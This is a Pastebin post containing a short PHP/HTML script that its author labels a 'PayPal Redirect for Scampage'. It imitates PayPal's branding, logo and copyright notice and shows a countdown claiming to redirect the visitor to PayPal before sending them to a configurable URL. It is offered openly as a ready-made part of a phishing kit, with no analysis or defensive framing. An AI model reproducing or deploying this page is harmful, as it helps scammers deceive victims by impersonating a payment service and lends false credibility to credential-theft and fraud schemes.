AlexaMP

PayPal Redirect Script (PHP) v1.0

Jan 3rd, 2018
530
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.03 KB | None | 0 0
  1. <?php
  2.  
  3. $url = "https://google.com"; //use http or https
  4.  
  5. # Created by AlexaMP
  6. # PayPal Redirect for Scampage v1.0
  7. # Auto Redirecting in 5 seconds
  8. # Already Manual Redirecting
  9. # Do not sell this script
  10. # You can share, but not for sale
  11. # Thanks For Using Us!
  12. ?>
  13. <!DOCTYPE html>
  14. <html>
  15. <head>
  16. <link rel="shortcut icon" href="https://lh3.googleusercontent.com/proxy/e4r_BWtC_X_p8ArY8nFzUWJgX4OWL22kh446kD0ZJmIin67_1fKJEy5pLyhlCXYBlOU4hkg1Yagh9cr135wMdYFsVTRhbiv1AaXIK1rf">
  17. <title>PayPal</title>
  18. <meta charset="utf-8">
  19. <style type="text/css">
  20. .login {
  21. margin: 250px auto;
  22. width: 400px;
  23. padding: 20px;
  24. border-radius:3px;
  25. border: 1px solid rgb(242, 242, 242);
  26. background: rgb(242, 242, 242);
  27. }
  28. </style>
  29. </head>
  30. <body>
  31. <div class="login">
  32. <center>
  33. <img src='https://lh3.googleusercontent.com/vIJ7bv0rBwc3IdHaocUXloyLhJR6_vGhpwQGpXMR3ZD8dK_OnXpzPgb2FSpXnol-QipG' width='130px'><br/><br/>
  34.  
  35.  
  36. <font size="consolas" size="5" color="gray">
  37. <div id="pesan"></div>
  38.         <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
  39.         <script>
  40.             var url = "<?php echo "$url"; ?>";
  41.             var count = 5;
  42.             function countDown() {
  43.                 if (count > 0) {
  44.                     count--;
  45.                     var waktu = count + 1;
  46.                  $('#pesan').html('Redirecting You To PayPal...');
  47.                     setTimeout("countDown()", 1000);
  48.                 } else {
  49.                     window.location.href = url;
  50.                 }
  51.             }
  52.             countDown();
  53.         </script>
  54. </font>
  55. <br/><br/><br/>
  56. <font size="1" face="calibri" color="gray">
  57. Not Redirected?<br/>
  58. <a href="<?php echo "$url"; ?>">
  59. <button style="width:100%;padding:10px;color:white;background:#0080FF;border:1px solid #0080FF;border-radius:3px;font-family:consolas;">
  60. Go To PayPal
  61. </button>
  62. </a>
  63. </font>
  64. </center><br/><font size="1">
  65. Copyright 1999-2017 PayPal. All rights reserved.<br/>PayPal is located at 2211 N. First St., San Jose, CA 95131.</font>
  66. </div> </body> </html>
Add Comment
Please, Sign In to add comment